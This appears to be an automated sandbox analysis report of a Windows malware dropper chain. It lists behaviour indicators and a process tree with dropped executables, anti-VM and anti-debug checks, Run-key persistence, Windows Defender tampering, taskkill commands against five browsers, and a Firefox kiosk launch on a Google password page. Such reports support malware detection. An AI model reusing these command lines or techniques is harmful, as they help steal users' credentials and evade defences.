Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 560 1p76f5.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 4560 firefox.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5540 msedge.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4560 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1488 wrote to memory of 560 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 85 PID 1488 wrote to memory of 560 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 85 PID 1488 wrote to memory of 560 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 85 PID 560 wrote to memory of 1712 560 1p76f5.exe 86 PID 560 wrote to memory of 1712 560 1p76f5.exe 86 PID 560 wrote to memory of 1712 560 1p76f5.exe 86 PID 1488 wrote to memory of 4928 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 87 PID 1488 wrote to memory of 4928 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 87 PID 1488 wrote to memory of 4928 1488 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe 87 PID 1712 wrote to memory of 4580 1712 skotes.exe 101 PID 1712 wrote to memory of 4580 1712 skotes.exe 101 PID 4580 wrote to memory of 4856 4580 B3vKvPi.exe 102 PID 4580 wrote to memory of 4856 4580 B3vKvPi.exe 102 PID 4580 wrote to memory of 4856 4580 B3vKvPi.exe 102 PID 1712 wrote to memory of 4452 1712 skotes.exe 105 PID 1712 wrote to memory of 4452 1712 skotes.exe 105 PID 1712 wrote to memory of 4452 1712 skotes.exe 105 PID 1712 wrote to memory of 4728 1712 skotes.exe 112 PID 1712 wrote to memory of 4728 1712 skotes.exe 112 PID 1712 wrote to memory of 4728 1712 skotes.exe 112 PID 1712 wrote to memory of 4980 1712 skotes.exe 121 PID 1712 wrote to memory of 4980 1712 skotes.exe 121 PID 1712 wrote to memory of 4980 1712 skotes.exe 121 PID 1712 wrote to memory of 2536 1712 skotes.exe 122 PID 1712 wrote to memory of 2536 1712 skotes.exe 122 PID 1712 wrote to memory of 2536 1712 skotes.exe 122 PID 2536 wrote to memory of 2940 2536 af21b79d53.exe 124 PID 2536 wrote to memory of 2940 2536 af21b79d53.exe 124 PID 2536 wrote to memory of 2940 2536 af21b79d53.exe 124 PID 2536 wrote to memory of 4400 2536 af21b79d53.exe 126 PID 2536 wrote to memory of 4400 2536 af21b79d53.exe 126 PID 2536 wrote to memory of 4400 2536 af21b79d53.exe 126 PID 2536 wrote to memory of 3428 2536 af21b79d53.exe 128 PID 2536 wrote to memory of 3428 2536 af21b79d53.exe 128 PID 2536 wrote to memory of 3428 2536 af21b79d53.exe 128 PID 2536 wrote to memory of 3432 2536 af21b79d53.exe 130 PID 2536 wrote to memory of 3432 2536 af21b79d53.exe 130 PID 2536 wrote to memory of 3432 2536 af21b79d53.exe 130 PID 2536 wrote to memory of 1548 2536 af21b79d53.exe 133 PID 2536 wrote to memory of 1548 2536 af21b79d53.exe 133 PID 2536 wrote to memory of 1548 2536 af21b79d53.exe 133 PID 2536 wrote to memory of 1804 2536 af21b79d53.exe 135 PID 2536 wrote to memory of 1804 2536 af21b79d53.exe 135 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1804 wrote to memory of 4560 1804 firefox.exe 136 PID 1712 wrote to memory of 528 1712 skotes.exe 137 PID 1712 wrote to memory of 528 1712 skotes.exe 137 PID 1712 wrote to memory of 528 1712 skotes.exe 137 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 PID 4560 wrote to memory of 3948 4560 firefox.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3404
-
C:\Users\Admin\AppData\Local\Temp\191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe"C:\Users\Admin\AppData\Local\Temp\191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p76f5.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p76f5.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 15806⤵
- Program crash
PID:1516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 15926⤵
- Program crash
PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013261001\ed5d6d0073.exe"C:\Users\Admin\AppData\Local\Temp\1013261001\ed5d6d0073.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4728 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 16126⤵
- Program crash
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 15926⤵
- Program crash
PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013262001\012ef94453.exe"C:\Users\Admin\AppData\Local\Temp\1013262001\012ef94453.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\1013263001\af21b79d53.exe"C:\Users\Admin\AppData\Local\Temp\1013263001\af21b79d53.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8beafafa-1ef2-4480-8bef-9376085a6b94} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" gpu8⤵PID:3948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2484 -prefMapHandle 2480 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0469ea3-c3bc-42b8-bc7c-ddc23bc1da61} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" socket8⤵PID:4596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 2876 -prefMapHandle 3032 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09427865-b2ef-4aee-bea7-035d3c38d444} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:4312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3816 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f6efcb2-1f2f-4615-a4fe-d5f212244c3f} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:3560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4544 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4796 -prefMapHandle 2904 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7390a76d-9e08-419b-ba71-970c1a5c2ce5} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" utility8⤵
- Checks processor information in registry
PID:6624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4428 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a48e308e-b2ac-45d8-af30-b22059905a00} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:7092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 4 -isForBrowser -prefsHandle 5416 -prefMapHandle 5420 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58eea69a-8a26-48ac-b9b1-87b3b0d7d93d} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:7104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 5 -isForBrowser -prefsHandle 5576 -prefMapHandle 5580 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8514e754-163a-4d19-bccd-71d0b6259567} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:7128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6056 -childID 6 -isForBrowser -prefsHandle 6072 -prefMapHandle 6068 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79842127-d493-4f4e-9f63-4b216927d3db} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab8⤵PID:6748
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013264001\5dd3e2b4f1.exe"C:\Users\Admin\AppData\Local\Temp\1013264001\5dd3e2b4f1.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe"C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:544 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A709.tmp\A70A.tmp\A70B.bat C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe"6⤵PID:5336
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"7⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5532 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffaef4acc40,0x7ffaef4acc4c,0x7ffaef4acc588⤵PID:5572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:28⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:38⤵PID:6028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2508 /prefetch:88⤵PID:6116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:18⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:18⤵PID:664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:88⤵PID:3920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:88⤵PID:4772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4888 /prefetch:88⤵PID:720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:88⤵PID:2128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4480,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:88⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:88⤵PID:6904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4876,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:28⤵PID:5472
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"7⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5540 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x90,0x17c,0x7ffaef2b46f8,0x7ffaef2b4708,0x7ffaef2b47188⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:28⤵PID:6272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:38⤵
- Suspicious behavior: EnumeratesProcesses
PID:6280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:88⤵PID:6308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:18⤵PID:6648
-
-
